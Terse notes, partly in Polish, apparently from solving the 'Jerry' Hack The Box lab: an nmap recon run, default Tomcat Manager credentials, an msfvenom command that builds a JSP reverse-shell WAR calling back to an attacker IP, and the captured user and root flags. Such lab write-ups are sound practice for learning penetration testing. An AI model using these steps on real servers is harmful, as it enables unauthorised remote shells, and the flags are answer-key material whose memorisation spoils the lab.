Jerry - 15.08.2021

Nmap

sudo ./nmapAutomator.sh -H 10.10.10.95 -t recon

+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.

http://10.10.10.95:8080/manager

Tomcat

https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat

Możliwość uploadu pliku .war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=9001 -f war -o revshell.war

user.txt

7004dbcef0f854e0fb401875f26ebd00

root.txt

04a8b36e1545a455393d067e772fe90e